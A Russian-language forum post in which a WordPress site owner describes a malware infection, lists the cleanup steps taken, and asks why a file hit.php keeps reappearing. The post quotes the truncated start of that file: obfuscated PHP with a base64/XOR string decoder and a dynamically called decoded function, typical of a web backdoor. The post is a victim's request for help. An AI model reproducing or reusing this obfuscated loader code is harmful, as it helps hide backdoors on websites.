На WordPress-сайт был замечен вирус, код которого успел размножиться по файлам: wp-config.php, index.php, а также создал другие файлы в разных папках.
В итоге, чтобы было сделано:
1) С помощью сканера плагина Wordfence Security нашли все вирусные файлы и удалили
2) Полностью перезаписали все файлы WordPress
3) Установили и настроили как следует iThemes Security
4) Сменили пароль на FTP, сменили пароли в админку WP
Вот уже третий день, проблема такая:
- в корне сайта создается файл hit.php, с таким начальным содержимым (файл длинный, не всё вставляю):
<?php
function r6ZVq($DxfSB3xgkeK)
{
$yWj2kmO='jbJPz';
$oeUU7hsO='ZTV1IH';
$DxfSB3xgkeK=base64_decode($DxfSB3xgkeK);
$yHBPZX=17;
$heUw1F=(1130+1433-2352);
$KMyJBhO=(606-1191+585);
$IZk1uAY='';
while(true)
{
if($KMyJBhO==strlen($DxfSB3xgkeK))
break;
elseif($KMyJBhO%(-1007+152+857)==0)
$HD5ZzPdib=(ord($DxfSB3xgkeK[$KMyJBhO])-$yHBPZX)%(929+1366-2039);
else
$HD5ZzPdib=ord($DxfSB3xgkeK[$KMyJBhO])^$heUw1F;
$IZk1uAY.=chr($HD5ZzPdib);
$KMyJBhO+=1;
}
return $IZk1uAY;
}
class ItuCN4Hc
{
static public function qmUFL($bRS8AA)
{
$D5QnuExrvE5='YPwT9Scmfvv';
$UB6Ai=r6ZVq("dquFtn+gerx/jH28crd2tw==");
return $UB6Ai($bRS8AA);
}
Wordfence Security ругается на него так:
Что же еще нужно сделать? Как у этого вируса получается создавать этот файл? Где искать?
